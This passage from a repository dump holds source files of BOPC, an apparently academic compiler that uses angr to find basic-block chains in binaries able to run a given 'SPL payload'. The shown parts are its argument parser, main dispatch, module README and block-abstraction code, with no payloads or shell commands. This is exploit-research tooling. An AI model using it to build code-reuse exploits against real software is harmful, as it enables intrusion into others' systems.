)\n\n    group_g.add_argument(\n        '-a', \"--abstractions\",\n        help     = \"Work with abstraction file\",\n        choices  = ['save', 'load', 'saveonly'],\n        default  = 'none',\n        action   = 'store',\n        dest     = 'abstractions',\n        required = False\n    )\n\n    group_g.add_argument(\n        \"--emit-IR\",\n        help     = \"Dump SPL IR to a file and exit\",\n        action   = 'store_const',\n        const    = True,\n        dest     = 'emit_IR',\n        required = False\n    )\n\n    # action='count'\n    group_g.add_argument(\n        '-d',\n        help     = \"Set debugging level to minimum\",\n        action   = 'store_const',\n        const    = DBG_LVL_1,\n        dest     = 'dbg_lvl',\n        required = False\n    )\n\n    group_g.add_argument(\n        '-dd',\n        help     = \"Set debugging level to basic (recommended)\",\n        action   = 'store_const',\n        const    = DBG_LVL_2,\n        dest     = 'dbg_lvl',\n        required = False\n    )\n\n    group_g.add_argument(\n        '-ddd',\n        help     = \"Set debugging level to verbose (DEBUG ONLY)\",\n        action   = 'store_const',\n        const    = DBG_LVL_3,\n        dest     = 'dbg_lvl',\n        required = False\n    )\n\n    group_g.add_argument(\n        '-dddd',\n        help     = \"Set debugging level to print-everything (DEBUG ONLY)\",\n        action   = 'store_const',\n        const    = DBG_LVL_4,\n        dest     = 'dbg_lvl',\n        required = False\n    )\n\n    group_g.add_argument(\n        '-V', \"--version\",\n        action   = 'version',\n        version  = 'BOPC %s' % VERSION\n    )\n\n\n    # -------------------------------------------------------------------------\n    # Group for searching arguments\n    # -------------------------------------------------------------------------\n    group_s.add_argument(\n        '-s', \"--source\",\n        help     = \"Source file with SPL payload\",\n        action   = 'store',\n        dest     = 'source',\n        required = False\n    )\n\n    group_s.add_argument(\n        '-e', \"--entry\",\n        help     = \"The entry point in the binary that payload starts\",\n        action   = 'store',\n        dest     = 'entry',\n        required = False\n    )\n\n    group_s.add_argument(\n        '-O', \"--optimizer\",\n        help     = \"Use the SPL optimizer (Default: none)\",\n        choices  = ['none', 'ooo', 'rewrite', 'full'],\n        action   = 'store',\n        default  = 'none',\n        dest     = 'optimizer',\n        required = False\n    )\n\n    group_s.add_argument(\n        '-f', \"--format\",\n        help     = \"The format of the solution (Default: raw)\",\n        choices  = ['raw', 'idc', 'gdb'],\n        action   = 'store',\n        default  = 'raw',\n        dest     = 'format',\n        required = False,\n    )\n\n    group_s.add_argument(\n        \"--find-all\",\n        help     = \"Find all the solutions\",\n        action   = 'store_const',\n        default  = 'one',\n        const    = 'all',\n        dest     = 'findall',\n        required = False\n    )\n\n\n    # -------------------------------------------------------------------------\n    # Group for debugging arguments\n    # -------------------------------------------------------------------------\n    group_d.add_argument(\n        \"--mapping-id\",\n        help     = \"Run the Trace Searching algorithm on a given mapping ID\",\n        metavar  = 'ID',\n        action   = 'store',\n        default  = -1,\n        dest     = 'mapping_id',\n        required = False\n    )\n\n    group_d.add_argument(\n        \"--mapping\",\n        help     = \"Run the Trace Searching algorithm on a given register mapping\",\n        metavar  = 'MAP',\n        nargs    = '+',\n        action   = 'store',\n        default  = [],\n        dest     = 'mapping',\n        required = False\n    )\n\n    group_d.add_argument(\n        \"--enum-mappings\",\n        help     = \"Enumerate all possible mappings and exit\",\n        action   = 'store_const',\n        default  = False,\n        const    = True,\n        dest     = 'enum_mappings',\n        required = False\n    )\n\n    group_d.add_argument(\n        \"--abstract-blk\",\n        help     = \"Abstract a specific basic block and exit\",\n        metavar  = 'BLKADDR',\n        action   = 'store',\n        dest     = 'absblk',\n        required = False\n    )\n\n\n    # -------------------------------------------------------------------------\n    # Group for application capabilities\n    # -------------------------------------------------------------------------\n    group_c.add_argument(\n        '-c', \"--capability\",\n        help     = textwrap.dedent('''\\\n                    Measure application's capability. Options (can be many)\n\n                    all\\tSearch for all Statements\n                    regset\\tSearch for Register Assignments\n                    regmod\\tSearch for Register Modifications\n                    memrd\\tSearch for Memory Reads\n                    memwr\\tSearch for Memory Writes\n                    call\\tSearch for Function/System Calls\n                    cond\\tSearch for Conditional Jumps\n                    load\\tLoad capabilities from file\n                    save\\tSave capabilities to file\n                    noedge\\tDump statements and exit (don't calculate edges)'''),\n        choices  = ['all', 'regset', 'regmod', 'memrd', 'memwr', 'call', 'cond',\n                    'save', 'load', 'noedge'],\n        metavar  = 'OPTIONS',\n        nargs    = '+',                             # consume >=1 arguments (multiple options)\n        action   = 'store',\n        dest     = 'capabilities',\n        required = False\n    )\n\n\n    if len(sys.argv) == 1:\n        parser.print_help(sys.stderr)\n        sys.exit(1)\n\n    return parser.parse_args()                      # do the parsing (+ error handling)\n\n\n\n# ---------------------------------------------------------------------------------------------\n# load(): Load the target binary and generate its CFG.\n#\n# :Arg filename: Binary's file name\n# :Ret: Function returns\n#\ndef load( filename ):\n    # load the binary (exception is thrown if name is invalid)\n    project = angr.Project(filename, load_options={'auto_load_libs': False})\n\n\n\n    # generate CFG\n    dbg_prnt(DBG_LVL_0, \"Generating CFG. It might take a while...\")\n    CFG = project.analyses.CFGFast()\n    dbg_prnt(DBG_LVL_0, \"CFG generated.\")\n\n\n    # normalize CFG (i.e. make sure that there are no overlapping basic blocks)\n    dbg_prnt(DBG_LVL_0, \"Normalizing CFG...\")\n    CFG.normalize()\n\n    # normalize every function object as well\n    for _, func in project.kb.functions.iteritems():\n        if not func.normalized:\n            dbg_prnt(DBG_LVL_4, \"Normalizing function '%s' ...\" % func.name)\n            func.normalize()\n\n    dbg_prnt(DBG_LVL_0, \"Done.\")\n\n\n    emph(\"CFG has %s nodes and %s edges\" %\n                (bold(len(CFG.graph.nodes())), bold(len(CFG.graph.edges()))))\n\n\n    # create a quick mapping between addresses and nodes (basic blocks)\n    for node in CFG.graph.nodes():\n        ADDR2NODE[ node.addr ] = node\n\n\n    # create a quick mapping between basic block addresses and their corresponding functions\n    for _, func in CFG.functions.iteritems():       # for each function\n        for addr in func.block_addrs:               # for each basic block in that function\n            ADDR2FUNC[ addr ] = func\n\n\n    return project, CFG\n\n\n\n# ---------------------------------------------------------------------------------------------\n# abstract(): Abstract the CFG and apply any further abstraction-related operations.\n#\n# :Arg mark: A valid graph marking object.\n# :Arg mode: Abstraction mode (load, save, saveonly, none)\n# :Arg filename: Abstraction's file name (if applicable)\n# :Ret: None.\n#\ndef abstract( mark, mode, filename ):\n    if mode == 'none':\n        mark.abstract_cfg()                         # calculate the abstractions\n\n    if mode == 'load':\n        mark.load_abstractions(filename)            # simply load the abstractions\n\n    elif mode == 'save':\n        mark.abstract_cfg()                         # calculate the abstractions\n        mark.save_abstractions(filename)            # and save them\n\n    elif mode == 'saveonly':\n        mark.abstract_cfg()\n        mark.save_abstractions(filename)\n        return -1\n\n    return 0\n\n\n\n# ---------------------------------------------------------------------------------------------\n# capability_analyses(): Apply any (custom) analyses to the capabilities.\n#\n# :Arg cap: The capability object\n# :Ret: None.\n#\ndef capability_analyses( cap ):\n    dbg_prnt(DBG_LVL_0, 'Applying additional Capability analyses...')\n    return\n\n    '''\n    # analyze all islands\n    # cap.analyze(P.CAP_LOOPS, P.CAP_STMT_MIN_DIST)\n\n    # analyze a specific island\n    # cap.analyze_island(0x400885, P.CAP_STMT_COMB_CTR)\n\n    i = 0\n    def foo( graph ):\n        global i\n        print 'Visualing island %d' % i\n        cap.visualize(graph, 'island_%d' % i, show_labels=True)\n\n        i += 1\n\n        for _, d in graph.nodes_iter(data=True):\n            print d['type'] # check capability.__add() for all keys\n\n\n    # apply the callback to every island\n    cap.callback( foo )\n    '''\n\n\n# -------------------------------------------------------------------------------------------------\n# main(): This is the main function of BOPC.\n#\n# Ret: None.\n#\nif __name__ == '__main__':\n    args = parse_args()                         # process arguments\n    set_dbg_lvl( args.dbg_lvl )                 # set debug level in coreutils\n\n    now  = datetime.datetime.now()              # get current time\n\n\n    # -------------------------------------------------------------------------\n    # Display banner\n    # -------------------------------------------------------------------------\n    print rainbow(textwrap.dedent('''\n        %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n        %                                                                    %\n        %                :::::::::   ::::::::  :::::::::   ::::::::          %\n        %               :+:    :+: :+:    :+: :+:    :+: :+:    :+:          %\n        %              +:+    +:+ +:+    +:+ +:+    +:+ +:+                  %\n        %             +#++:++#+  +#+    +:+ +#++:++#+  +#+                   %\n        %            +#+    +#+ +#+    +#+ +#+        +#+                    %\n        %           #+#    #+# #+#    #+# #+#        #+#    #+#              %\n        %          #########   ########  ###         ########                %\n        %                                                                    %\n        %                Block Oriented Programming Compiler                 %\n        %                                                                    %\n        %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n        '''))\n\n    print comments\n    print \"[*] Starting BOPC %s at %s\" % (VERSION, bolds(now.strftime(\"%d/%m/%Y %H:%M\")))\n\n\n    # -------------------------------------------------------------------------\n    # BOPC operation: Emit SPL IR\n    # -------------------------------------------------------------------------\n    if args.emit_IR and args.source:\n        IR = C.compile(args.source)\n        IR.compile()                                # compile the SPL payload\n\n        IR = O.optimize(IR.get_ir())\n        IR.optimize(mode=args.optimizer)           # optimize IR (if needed)\n\n        IR.emit(args.source)\n\n\n    # -------------------------------------------------------------------------\n    # BOPC operation: Trace Search\n    # -------------------------------------------------------------------------\n    elif args.source and args.entry:\n        IR = C.compile(args.source)\n        IR.compile()                                # compile the SPL payload\n\n        IR = O.optimize(IR.get_ir())\n        IR.optimize(mode=args.optimizer)            # optimize IR (if needed)\n\n\n        project, CFG = load(args.binary)\n        mark         = M.mark(project, CFG, IR, 'puts')\n\n        if abstract(mark, args.abstractions, args.binary) > -1:\n            entry = int(args.entry, 0)              # get entry point\n\n            X = mark.mark_candidate(sorted(map(lambda s : tuple(s.split('=')), args.mapping)))\n\n            if not X:\n                print 'abort';\n                exit()\n\n\n        #   visualize('cfg_cand', entry=entry, options=VO_DRAW_CFG|VO_DRAW_CANDIDATE)\n\n            # extract payload name (without the extenstion)\n            payload_name = ntpath.basename(args.source)\n            payload_name = os.path.splitext(payload_name)[0]\n\n\n            try:\n                options = {\n                    'format'     : args.format,\n                    'solutions'  : args.findall,\n                    'mapping-id' : int(args.mapping_id),\n                    'mapping'    : sorted(map(lambda s : tuple(s.split('=')), args.mapping)),\n                    'filename'   : '%s-%s' % (args.binary, payload_name),\n                    'enum'       : args.enum_mappings,\n\n                    'simulate'   : False,\n                    '#mappings'  : 0,\n                    '#solutions' : 0\n                }\n\n            except ValueError:\n                fatal(\"'mapping' argument must be an integer\")\n\n\n            tsearch = S.search(project, CFG, IR, entry, options)\n            tsearch.trace_searching(mark)\n\n            # -----------------------------------------------------------------\n            # Show some statistics\n            # -----------------------------------------------------------------\n            emph(\"Trace Searching Statistics:\" )\n            emph(\"\\tUsed Simulation? %s\"  % bolds(options['simulate']))\n            emph(\"\\t%s Mapping(s) tried\"  % bold(options['#mappings']))\n            emph(\"\\t%s Solution(s) found\" % bold(options['#solutions']))\n\n\n    # -------------------------------------------------------------------------\n    # BOPC operation: Dump abstractions\n    # -------------------------------------------------------------------------\n    elif args.abstractions == 'saveonly':\n        # IR is useless; we're only dumping abstractions\n        project, CFG = load(args.binary)\n        mark         = M.mark(project, CFG, None, 'puts')\n\n        abstract(mark, args.abstractions, args.binary)\n\n\n    # -------------------------------------------------------------------------\n    # BOPC operation: Application Capability\n    # -------------------------------------------------------------------------\n    elif args.capabilities:\n         # IR is useless; we're measuring capability\n        project, CFG = load(args.binary)\n        mark         = M.mark(project, CFG, None, 'puts')\n\n        abstract(mark, args.abstractions, args.binary)\n\n        # cfg is loaded with abstractions\n        cap = P.capability(CFG, args.binary)\n\n        options = 0\n\n        for stmt in args.capabilities:\n            options = options | {\n                'all'    : P.CAP_ALL,\n                'regset' : P.CAP_REGSET,\n                'regmod' : P.CAP_REGMOD,\n                'memrd'  : P.CAP_MEMRD,\n                'memwr'  : P.CAP_MEMWR,\n                'call'   : P.CAP_CALL,\n                'cond'   : P.CAP_COND,\n                'load'   : P.CAP_LOAD,\n                'save'   : P.CAP_SAVE,\n                'noedge' : P.CAP_NO_EDGE\n            }[stmt]     # argparse ensures no KeyError\n\n        cap.build(options=options)                  # build the Capability Graph\n        cap.save()                                  # save nodes to a file\n        cap.explore()                               # explore Islands\n\n        capability_analyses( cap )\n\n\n    # -------------------------------------------------------------------------\n    # BOPC operation: Single block abstraction\n    # -------------------------------------------------------------------------\n    elif args.binary and args.absblk:\n        project = angr.Project(args.binary, load_options={'auto_load_libs': False})\n\n        load(args.binary)\n\n        abstr   = A.abstract_ng(project, int(args.absblk, 0))\n\n        dbg_prnt(DBG_LVL_0, 'Abstractions for basic block 0x%x:' % int(args.absblk, 0))\n        for a, b in abstr:\n            if a == 'regwr':\n                dbg_prnt(DBG_LVL_0, '%14s :' % a)\n                for c, d in b.iteritems():\n                    dbg_prnt(DBG_LVL_0, '\\t\\t%s = %s' % (c, str(d)))\n\n            else:\n                dbg_prnt(DBG_LVL_0, '%14s : %s' % (a, str(b)))\n\n\n    # -------------------------------------------------------------------------\n    # invalid BOPC operation\n    # -------------------------------------------------------------------------\n    else:\n        fatal('Invalid configuration argument')\n\n\n    emph('')\n    emph('BOPC has finished.', DBG_LVL_0)\n    emph('Have a nice day!',        DBG_LVL_0)\n    emph('Bye bye :)',              DBG_LVL_0)\n\n    warn('A segmentation fault may occur now, due to an internal angr issue')\n\n\n\n# ---------------------------------------------------------------------------------------\n"
  },
  {
    "path": "source/README.md",
    "content": "\n\n# Block Oriented Programming Compiler (BOPC)\n\n\n___\n\n### BOPC Implementation Overview\n\n![alt text](./images/BOPC_overview.png)\n\n\n### Source Code Overview\n\n\n| File                             | Description                                 |\n| ---------------------------------|---------------------------------------------|\n| [BOPC.py](./BOPC.py)             | Main file |\n| [absblk.py](./absblk.py)         | Basic block abstraction |\n| [calls.py](./calls.py)           | Supported library and system calls |\n| [capability.py](./capability.py) | Application Capability |\n| [compile.py](./compile.py)       | SPL compiler |\n| [config.py](./config.py)         | Configuration file |\n| [coreutils.py](./coreutils.py)   | Shared utils across modules |\n| [delta.py](./delta.py)           | Delta graph |\n| [map.py](./map.py)               | Mapping across registers and variables |\n| [mark.py](./mark.py)             | Marking and re-Marking CFG |\n| [optimize.py](./optimize.py)     | SPL optimizer |\n| [output.py](./output.py)         | Write solutions to a file |\n| [path.py](./path.py)             | CFG shortest paths |\n| [search.py](./search.py)         | Trace Searching algorithm |\n| [simulate.py](./simulate.py)     | Concolic execution |\n\n\n___"
  },
  {
    "path": "source/absblk.py",
    "content": "#!/#!/usr/bin/env python2\n# -------------------------------------------------------------------------------------------------\n#\n#    ,ggggggggggg,     _,gggggg,_      ,ggggggggggg,      ,gggg,  \n#   dP\"\"\"88\"\"\"\"\"\"Y8, ,d8P\"\"d8P\"Y8b,   dP\"\"\"88\"\"\"\"\"\"Y8,  ,88\"\"\"Y8b,\n#   Yb,  88      `8b,d8'   Y8   \"8b,dPYb,  88      `8b d8\"     `Y8\n#    `\"  88      ,8Pd8'    `Ybaaad88P' `\"  88      ,8Pd8'   8b  d8\n#        88aaaad8P\" 8P       `\"\"\"\"Y8       88aaaad8P\",8I    \"Y88P'\n#        88\"\"\"\"Y8ba 8b            d8       88\"\"\"\"\"   I8'          \n#        88      `8bY8,          ,8P       88        d8           \n#        88      ,8P`Y8,        ,8P'       88        Y8,          \n#        88_____,d8' `Y8b,,__,,d8P'        88        `Yba,,_____, \n#       88888888P\"     `\"Y8888P\"'          88          `\"Y8888888 \n#\n#   The Block Oriented Programming (BOP) Compiler - v2.1\n#\n#\n# Kyriakos Ispoglou (ispo) - ispo@purdue.edu\n# PURDUE University, Fall 2016-18\n# -------------------------------------------------------------------------------------------------\n#\n#\n# absblk.py:\n#\n# This module implements the basic block \"abstractions\". Abstraction is a process that summarizes\n# a basic block into the \"impact\" on program's state.\n#\n# -------------------------------------------------------------------------------------------------\nfrom coreutils import *\nimport signal\nimport simuvex\nimport claripy\nimport archinfo\nimport angr\n\n\n\n# ------------------------------------------------------------------------------------------------\n# Constant Definitions\n# ------------------------------------------------------------------------------------------------\n_STACK_SZ = 0x1000                                  # size of symbolic stack\n\n\n\n# -------------------------------------------------------------------------------------------------\n# abstract_ng: This class implements the next generation of the basic block \"abstraction\". So\n#   far, the following abstractions are supported:\n#  \n#   * * Register Writes * *\n#   A dictionary that contains all registers that are being written. The \"write\" information is\n#   another dictionary with the following fields:\n#\n#       * type     : Can be 'concrete', 'deref', 'mod' or 'clob'. A register is of type 'clob'\n#                    when, it does not fall to any of the other types\n#       * const    : ('concrete' and 'mod' types). The constant value that is written to the\n#                    register\n#       * writable : ('concrete' types). If the constant value is a valid and writable memory\n#                    address, then this field is set to True\n#       * op       : ('mod' types). The modification operator\n#       * addr     : ('deref' types). The address that register value is loaded from\n#       * deps     : ('deref' types). Any registers that participate in addr field\n#       * sym      : ('deref' types). A mapping between registers and their symbolic variables\n#       * memrd    : ('deref' types). When the register write can be used as a memory read, this\n#                    field contains the size of the memory read in bytes (1,2,4,8). Otherwise it\n#                    is set to None\n#\n#   Example:\n#       regwr = {\n#           rsp : {'type': 'concrete', 'const': 576460752303357888L, 'writable': True },\n#           rcx : {'type': 'deref', 'addr': <BV64 rsi_43_64 + 0x10>, 'deps': ['rsi']},\n#           r9  : {'type': 'mod', 'op': '+', 'const': 1337L}\n#       }\n#\n#\n#   * * Memory Reads * *\n#   A list of tuples (address, size) for every memory read.\n#\n#   Example:\n#       memrd = set([(<SAO <BV64 0x7ffffffffff0810>>, 64), (<SAO <BV64 0x7ffffffffff0818>>, 64)])\n#\n#\n#   * * Memory Writes * *\n#   A list of tuples (address, data) for every memory write (len(data) indicates the size)\n#\n#   Example:\n#       memwr = set([(<SAO <BV64 0x7ffffffffff07f8>>, <SAO <BV64 rbx_1_64>>), \n#                    (<SAO <BV64 0x7ffffffffff07e0>>, <SAO <BV64 0x416631>>)])\n#\n#\n#   * * Concrete Writes * *\n#   A list of tuples (address, size) for every concrete memory write.\n#\n#   Example:\n#       conwr = set([(576460752303359992L, 64), (576460752303359968L, 64)])\n#\n#\n#   * * SPL Memory Writes * *\n#   A list of dictionaries for every SPL memory write (memory writes that are in the form:\n#   \"mov [rax], rbx\"). Each dictionary contains the following fields:\n#\n#       * mem  : The register that holds the address to write (string)\n#       * val  : The register that holds the value to be written (string)\n#       * size : The number of bytes to write (e.g., mov [rax], cl, mov [rbx], dx)\n#       * sym  : A mapping between registers and their symbolic variables\n#\n#   Example:\n#       splmemwr = [{\n#            'mem'  : 'rbx', \n#            'val'  : 'rax', \n#            'size' : 4,\n#            'sym'  : {'rax': <BV64 rax_0_64>, 'rbx': <BV64 rbx_1_64>}\n#       }]\n#\n#\n#   * * Calls * *\n#   A dictionary with the following fields:\n#\n#       * type : Can be 'syscall', or 'libcall'\n#       * name : The name of the call\n#\n#   Example:\n#       call = {'type': 'libcall', 'name': u'puts'}\n#\n#\n#   * * Conditional Jumps * *\n#   A dictionary with the following fields:\n#\n#       * form      : The form of the conditional jump ('simple' / 'extended')\n#       * reg       : The register that participates in the conditional jump\n#       * const     : The constant value that register is compared against\n#       * op        : The comparison operator\n#       * mod_op    : ('extended' types). The operator of the register modification\n#       * mod_const : ('extended' types). The constant of the register modification\n#\n#   Example:\n#       cond = {'reg': 'r11', 'op': '==', 'const': 11L}\n#       cond = {'mod_op': '^', 'const': 0L, 'form': 'extended', 'op': '=='}\n#\n#\n#   * * Symbolic Variables * *\n#   A dictionary that maps the symbolic variables to their actual addresses that they correspond\n#\n#   Example:\n#       symvar = {<BV64 mem_7fffffffffef1e8_82_64>' : 0x7fffffffffef1e8}\n#\n#\n# * * * ---===== TODO list =====--- *\n#\n#   [1]. Make absblk more precise i.e., check the order of memory writes\n#   [2]. Move this list at the beginning of the file.\n#\nclass abstract_ng( object ):\n    ''' ======================================================================================= '''\n    '''                                   AUXILIARY FUNCTIONS                                   '''\n    ''' ======================================================================================= '''\n \n    # ---------------------------------------------------------------------------------------------\n    # __reg_w(): Analyze the register writes of the symbolic execution.\n    #\n    # :Arg state: Program's state after symbolic execution\n    # :Ret: None.\n    #\n    def __reg_w( self, state ): \n        visited = set()                             # visited registers\n\n        for action in reversed(state.actions):      # for every action (start backwards)    \n            if not (action.type == 'reg' and action.action == 'write'):\n                continue                            # we care about register writes only                        \n\n            try:\n                # we only care about the most recent register write only            \n                reg = self.__proj.arch.register_names[action.offset]\n            except KeyError:\n                continue\n\n            # get the last write only\n            if reg not in HARDWARE_REGISTERS or reg in visited:\n                continue\n\n            data = { }                              # various data related to the write\n            visited.add(reg)                        # make sure that you won't visit this again\n\n\n            # ---------------------------------------------------------------------------\n            # If some address (initialized or not) is used as a dereference, the regwr\n            # entry for that register must be preserved (we should not overwrite register\n            # with the actual value in that address)\n            # ---------------------------------------------------------------------------\n            if reg in self.regwr and self.regwr[ reg ]['type'] == 'deref':\n                continue\n\n            # The register is being modified, so we start by marking it as clobbering\n            if reg not in self.regwr:\n                self.regwr[ reg ] = {'type' : 'clob'}\n\n            \n            # -----------------------------------------------------------------\n            if action.data.concrete:                # if register gets a concrete value,\n                value = state.se.eval(action.data)  # concretize it\n\n                data['type']     = 'concrete'       # set data\n                data['const']    = value\n                data['writable'] = True             # initialize this first\n                in_section = False\n\n                # now, check whether this value is a writable address                \n                try:                    \n                    # The problem: There are some weird sections (.e.g., \".comment\") whose VA\n                    # starts from 0. Therefore, we may have register writes with constants like\n                    # 1, 2 and so on, which are marked as +W. This means that at the end we can \n                    # have memory reservations (writes) at those addresses. Our old approach with \n                    # \"state.memory.permissions(value)\" doesn't work here.\n                    #\n                    # So iterate over ELF sections looking for it\n                    for _, sec in  self.__proj.loader.main_object.sections_map.iteritems():                        \n                        # it's possible for the value to be part of >1 sections (usually when\n                        # section's VA is 0; sec.vaddr != 0). We mark value as +W only when *all*\n                        # sections are writable\n                        if sec.contains_addr(value):\n                            data['writable'] &= sec.is_writable\n                            in_section = True\n\n\n                    # if can't find section (b/c it's generated at runtime, like .stack)\n                    if not in_section:\n                        # TODO: check if value+1, value+2, etc. are writable as well\n                        rwx = state.memory.permissions(value)\n\n                        if state.se.eval(rwx) & 2 == 2: # is +W (2nd bit) set?\n                            data['writable'] = True\n                        else:\n                            data['writable'] = False\n                        \n                except Exception, e:                # page does not exist at given address\n                    data['writable'] = False        # not writable at all\n\n                    try:\n                        # special case when a stack address is in the next page (-W)\n                        if value & 0x07ffffffffff0000 == 0x07ffffffffff0000:\n                            rwx = state.memory.permissions(value-0x4000)\n\n                            # give it a second change\n                            if state.se.eval(rwx) & 2 == 2:\n                                data['writable'] = True\n\n                    except Exception, e:            # or angr.errors.SimMemoryError\n                        pass\n\n            # -----------------------------------------------------------------\n            else:                                   # register doesn't get a concrete value\n\n                # register gets an expression. Check for simple register modifications: \n                # \"<reg> <op>= <const>\" (we can easily scale this to <reg> <op>= <reg>)\n                # Note that modified register should be the same with action.offset\n                node = [leaf for leaf in action.data.recursive_leaf_asts]\n                    \n                # we need an AST with depth 2, 2 leaves and 1 variable (i.e., register)\n                if action.data.depth == 2 and len(action.data.variables) == 1 and len(node) == 2:\n                    try:\n                        data['op'] = {              # cast operator\n                            '__add__'    : '+',\n                            '__sub__'    : '-',\n                            '__mul__'    : '*',\n                            '__div__'    : '/',\n                            '__and__'    : '&',\n                            '__or__'     : '|',\n                            '__xor__'    : '^',\n                            '__invert__' : '~',\n                            '__lshift__' : '<<',\n                            '__rshift__' : '>>'\n                        }[ action.data.op ]\n                    \n                        # if constant is on the left, swap sides\n                        if node[0].op == 'BVV' and node[0].concrete:\n                            node[0], node[1] = node[1], node[0]\n\n\n                        # check if we're in the form: <reg> <op> <const> \n                        if node[0].op == 'BVS' and self.__symreg[node[0]] == reg and \\\n                           node[1].op == 'BVV' and node[1].concrete:\n                                data['type']  = 'mod'\n                                data['const'] = state.se.eval(node[1])\n                        else:                       # not in the right form\n                                continue\n\n                    except KeyError:                # __symreg() threw an exception\n                        continue\n\n        \n                # -----------------------------------------------------------------------\n                # Consider the following case:\n                #       .text:000000000040BA49         mov     eax, [rbp+tfd]\n                #       .text:000000000040BA52         mov     edi, eax         ; fd\n                #\n                # Here, edi gets exactly the same value with eax, but edi is marked as\n                # 'clob', while eax as 'deref'. The root cause is that edi does not\n                # participate in any memory reads and the assigned value is not constant\n                # (i.e., it doesn't come directly from a register).\n                #\n                # To fix that we check whether a 'clob' register has *exactly* the same \n                # symbolic value with another one (eax in our example), and if so we \n                # assign the same regwr entry to it.\n                # -----------------------------------------------------------------------\n                else:\n                    # iterate over previous writes\n                    for reg2, val in self.__reg_rawval.iteritems():\n                        try:\n\n                            # check if raw values match\n                            if reg != reg2 and val.shallow_repr() == action.data.shallow_repr():\n\n                                self.regwr[ reg ] = self.regwr[ reg2 ]\n                                pass\n\n                        except KeyError:\n                            pass\n\n\n            # -----------------------------------------------------------------\n            if data:\n                self.regwr[ reg ] = data            # set data to this register\n        \n\n\n    # ---------------------------------------------------------------------------------------------\n    # __mem_r(): Analyze the memory reads of the symbolic execution.\n    #\n    # :Arg state: Program's state after symbolic execution\n    # :Ret: None.\n    #\n    def __mem_r( self, state ):\n        for action in state.actions:                # for every action        \n            if not (action.type == 'mem' and action.action == 'read'):\n                continue                            # we care about memory reads only\n\n            # simply add address (can be an expression) and size to the list\n            self.memrd.add( (action.addr, len(action.data)) )\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __mem_w(): Analyze the memory writes of the symbolic execution.\n    #\n    # :Arg state: Program's state after symbolic execution\n    # :Ret: None.\n    #\n    def __mem_w( self, state ):\n        for action in state.actions:                # for every action        \n            if not (action.type == 'mem' and action.action == 'write'):\n                continue                            # we care about memory writes only\n\n            # simply add address (can be an expression) and data to the list\n            self.memwr.add( (action.addr, action.data) ) \n            \n            if action.addr.concrete:                # if address is concrete\n                # concretize it as well\n                self.conwr.add( (state.se.eval(action.addr), len(action.data)) )\n\n\n            deps   = [ ]\n            symtab = { }\n\n            # -----------------------------------------------------------------\n            # Check for memory register writes (mov [rax], rbx)\n            #\n            # In this case, both action.addr and action.data will consist of a\n            # single leaf in their ast which is a register\n            # -----------------------------------------------------------------\n            mem_reg = [leaf for leaf in action.addr.recursive_leaf_asts]\n            val_reg = [leaf for leaf in action.data.recursive_leaf_asts]\n\n\n            # print 'ADDR', mem_reg, action.addr\n            # print 'ADDR', val_reg, action.addr\n                 \n            # check AST have a single leaf\n            if len(mem_reg) == 1 and len(val_reg) == 1:\n                mem, val = None, None\n\n                # check whether the leaf is a register\n                for sym, nam in self.__symreg.iteritems():\n                    # skip registers that are not symbolic (e.g., rbp)\n                    if isinstance(sym.args[0], str) and sym.args[0] in mem_reg[0].shallow_repr():                        \n                        symtab[nam] = sym\n                        mem         = nam\n\n                    elif isinstance(sym.args[0], str) and sym.args[0] in val_reg[0].shallow_repr():                        \n                        symtab[nam] = sym\n                        val         = nam\n\n                # if both leaves are registers we have a memory register write!\n                if mem and val:                \n                    self.splmemwr.append({\n                        'mem'  : mem,\n                        'val'  : val,\n                        'size' : int(action.size) >> 3,\n                        'sym'  : symtab,                      \n                    })\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __call(): Analyze the (sys|lib)calls of the symbolic execution. Because we're analyzing a\n    #       single basic block, we can have up to one such (sys|lib)call (the last instruction).\n    #\n    # :Arg state: Program's state after symbolic execution\n    # :Ret: None.\n    #\n    def __call( self, state ):\n        blk = self.__proj.factory.block(self.__entry)\n\n        # check if symbolic execution stopped on a syscall\n        # (don't use \"if self.__proj._simos.is_syscall_addr(state.addr)\"; it throws exceptions)\n        if blk.vex.jumpkind == \"Ijk_Sys_syscall\":\n            # a system call was invoked\n            # we assume that simproc.cc == SimCCAMD64LinuxSyscall                \n            simproc = self.__proj._simos.syscall(state)\n\n            self.call['type'] = 'syscall'\n            self.call['name'] = simproc.display_name\n            # self.call['nargs'] = simproc.num_args\n\n        else:  \n            if blk.vex.jumpkind != \"Ijk_Call\":      # skip block when it doesn't end with a call\n                return\n\n\n            # check if symbolic execution stopped on a library call\n            for action in reversed(state.actions):  # for every action        \n                if action.type != 'exit':\n                    continue                        # we care about branches only\n\n\n                # concretize function's entry point\n                target = state.se.eval(action.target)\n\n                # Note: Before you use kb.functions, calculate CFG (e.g., analyses.CFGFast())\n                try:\n                    self.call['type'] = 'libcall'\n                    self.call['name'] = self.__proj.kb.functions[target].name\n                except Exception:                   # no function name at that address\n                    self.call = { }\n\n\n\n    # ---------------------------------------------------------------------------------------------\n    # __cond(): Analyze the conditional jump of the symbolic execution. Because we're analyzing a\n    #       single basic block, we can have up to one conditional jump.\n    #\n    # :Arg state: Program's state after symbolic execution\n    # :Ret: None.\n    #\n    def __cond( self, state ):        \n        for action in reversed(state.actions):      # for every action        \n            if not (action.type == 'exit' and action.exit_type == 'conditional'):\n                continue                            # we care about conditional jumps only\n          \n\n            # as in __reg_w(), we only care about simple conditional jumps: \"<reg> <op> <const>\"\n            if len(action.condition.variables) == 1:  \n                try:\n                    self.cond['op'] = {             # cast operator\n                        '__eq__' : '==',\n                        '__ne__' : '!=',\n                        '__le__' : '<=',\n                        '__lt__' : '<',\n                        '__ge__' : '>=',\n                        '__gt__' : '>',\n\n                        'SGT'    : '>',                        \n                        'SGE'    : '>=',\n                        'SLT'    : '<',\n                        'SLE'    : '<=',                        \n                        'UGT'    : '>',             # do not distinguish signed/unsigned operators\n                        'UGE'    : '>=',\n                        'ULT'    : '<',\n                        'ULE'    : '<=',\n                    }[ action.condition.op ]\n                except KeyError: \n                    warn('Unknown conditional jump operator \"%s\"' % action.condition.op)\n                    self.cond = { }\n                    return\n\n                \n                node = [leaf for leaf in action.condition.recursive_leaf_asts]\n\n\n                # -----------------------------------------------------------------------\n                # Check if we're in the simple form: <reg> <op> 